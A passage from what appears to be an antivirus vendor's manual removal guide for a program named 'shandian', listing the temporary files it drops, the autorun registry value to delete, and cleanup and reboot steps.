      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\tmplrr89e.dll (29256 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\uqvv.exe.bdl (237681 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp\BDLogicUtils.dll.bdl (39225 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)

    4. Delete the following value(s) in the autorun key (How to Work with System Registry):

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "shandian" = "%Program Files%\shandian\shandian.exe"

    5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
